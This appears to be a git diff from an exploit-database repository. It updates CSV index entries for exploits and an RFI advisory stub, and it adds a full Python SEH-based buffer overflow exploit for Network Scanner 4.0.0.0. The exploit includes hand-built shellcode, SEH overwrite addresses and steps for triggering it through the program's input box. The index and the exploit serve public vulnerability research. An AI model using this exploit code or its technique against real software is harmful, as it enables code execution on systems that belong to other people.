||||
27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps,0
|
||||
27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80
|
||||
27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000
|
||||
27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80
|
||||
|
|
@ -30596,7 +30596,7 @@ id,file,description,date,author,platform,type,port
|
|||
33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double-Free Memory Corruption",2010-04-20,"Joel Johnson",linux,remote,0
|
||||
33856,platforms/php/webapps/33856.txt,"Viennabux Beta! - 'cat' Parameter SQL Injection",2010-04-09,"Easy Laster",php,webapps,0
|
||||
33858,platforms/php/webapps/33858.txt,"DBSite wb CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0
|
||||
34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - MBM File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0
|
||||
34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0
|
||||
34144,platforms/php/webapps/34144.txt,"Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting",2010-06-08,"L0rd CrusAd3r",php,webapps,0
|
||||
34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0
|
||||
34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",php,webapps,0
|
||||
|
|
@ -35570,7 +35570,7 @@ id,file,description,date,author,platform,type,port
|
|||
39221,platforms/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win_x86-64,dos,0
|
||||
39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0
|
||||
39223,platforms/php/webapps/39223.txt,"ZeusCart - 'prodid' Parameter SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0
|
||||
39224,platforms/hardware/remote/39224.py,"Fortigate OS Version 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
|
||||
39224,platforms/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
|
||||
39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0
|
||||
39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0
|
||||
39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0
|
||||
|
|
@ -35779,7 +35779,7 @@ id,file,description,date,author,platform,type,port
|
|||
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
|
||||
39445,platforms/linux/dos/39445.c,"Ntpd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
|
||||
39446,platforms/win_x86/local/39446.py,"Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
|
||||
39447,platforms/windows/dos/39447.py,"Network Scanner Version 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0
|
||||
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0
|
||||
39448,platforms/php/webapps/39448.txt,"Tiny Tiny RSS - Blind SQL Injection",2016-02-15,"Kacper Szurek",php,webapps,80
|
||||
39449,platforms/multiple/webapps/39449.txt,"ManageEngine OPutils 8.0 - Multiple Vulnerabilities",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0
|
||||
39450,platforms/multiple/webapps/39450.txt,"ManageEngine Network Configuration Management Build 11000 - Privilege Escalation",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0
|
||||
|
|
@ -36670,7 +36670,7 @@ id,file,description,date,author,platform,type,port
|
|||
40558,platforms/php/webapps/40558.txt,"School Full CBT 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
|
||||
40559,platforms/php/webapps/40559.txt,"PHP Business Directory - Multiple Vulnerabilities",2016-10-17,larrycompress,php,webapps,0
|
||||
40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
|
||||
40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0
|
||||
40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0
|
||||
40562,platforms/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",windows,local,0
|
||||
40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0
|
||||
40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0
|
||||
|
|
@ -36725,3 +36725,4 @@ id,file,description,date,author,platform,type,port
|
|||
40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
|
||||
40628,platforms/php/webapps/40628.pl,"EC-CUBE 2.12.6 - Server-Side Request Forgery",2016-10-24,Wadeek,php,webapps,0
|
||||
40629,platforms/hardware/webapps/40629.txt,"Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management",2016-10-24,"Sniper Pex",hardware,webapps,0
|
||||
40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
|
|
@ -1,6 +1,9 @@
|
|||
PHP-CON v1.3 (include.php)Remote File Inclusion Vulnerability
|
||||
PHP-CON 1.3 - 'include.php' Remote File Inclusion
|
||||
|
||||
Script : http://sourceforge.net/project/showfiles.php?group_id=182182
|
||||
|
||||
POC :
|
||||
|
||||
/PHP_CON/Exchange/include.php?webappcfg[APPPATH]= Evil Code
|
||||
|
||||
# milw0rm.com [2007-11-28]
|
||||
|
|
|
|||
71
platforms/windows/local/40630.py
Executable file
71
platforms/windows/local/40630.py
Executable file
|
|
@ -0,0 +1,71 @@
|
|||
#!/usr/bin/python
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ###
|
||||
|
||||
# Date: 2016-10-21
|
||||
# Exploit Author: n30m1nd
|
||||
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit
|
||||
# Vendor Homepage: http://www.mitec.cz/
|
||||
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip
|
||||
# Version: 4.0.0.0
|
||||
# Tested on: Win7 64bit and Win10 64 bit
|
||||
|
||||
# Credits
|
||||
# =======
|
||||
# PoC by: INSECT.B - http://binsect00.tistory.com
|
||||
# https://www.exploit-db.com/exploits/39447/
|
||||
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
|
||||
|
||||
# How to
|
||||
# ======
|
||||
# * Run this python script. It will generate an "exploit.txt" file.
|
||||
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents
|
||||
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time
|
||||
|
||||
# Exploit code
|
||||
# ============
|
||||
|
||||
import struct
|
||||
|
||||
# MessageBoxA in NetScan.exe => 004042F1
|
||||
mbox = (
|
||||
"\x25\x41\x41\x41"
|
||||
"\x41\x25\x32\x32"
|
||||
"\x32\x32\x50\x68"
|
||||
"\x70\x77\x6E\x64"
|
||||
"\x54\x5F\x50\x57"
|
||||
"\x57\x50\x35\x8E"
|
||||
"\x60\x60\x55\x35"
|
||||
"\x7F\x22\x20\x55"
|
||||
"\x50\xC3"
|
||||
)
|
||||
# JUMP BACK to our shellcode!
|
||||
nseh = (
|
||||
# xor al,51h; Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)
|
||||
"\x34\x51"
|
||||
# jne -32h; Jump if ZF = 0
|
||||
"\x75\xCC"
|
||||
)
|
||||
# pop pop ret => 00402E67
|
||||
sehh = struct.pack("<L", 0x00402e67)
|
||||
|
||||
payl = "A" * (76-48)
|
||||
payl+= mbox
|
||||
payl+= "A"*(48-len(mbox))
|
||||
payl+= nseh + sehh
|
||||
|
||||
with open("exploit.txt","wb") as f:
|
||||
f.write(payl[:-1])
|
||||
print payl
|
||||
|
||||
"""
|
||||
NOTE:
|
||||
The original author of this PoC stated that it was not possible to be
|
||||
exploited since all addresses inside the binary contain the null byte.
|
||||
As you can see in this exploit, the null byte is added by default at
|
||||
the end because strings are null terminated when read from an input
|
||||
box. This is why we write the payload minus 1 byte, payl[:-1], because
|
||||
we don't need to write the last null byte for the "pop pop ret" jump
|
||||
in the "sehh" variable.
|
||||
"""
|
||||
Loading…
Add table
Reference in a new issue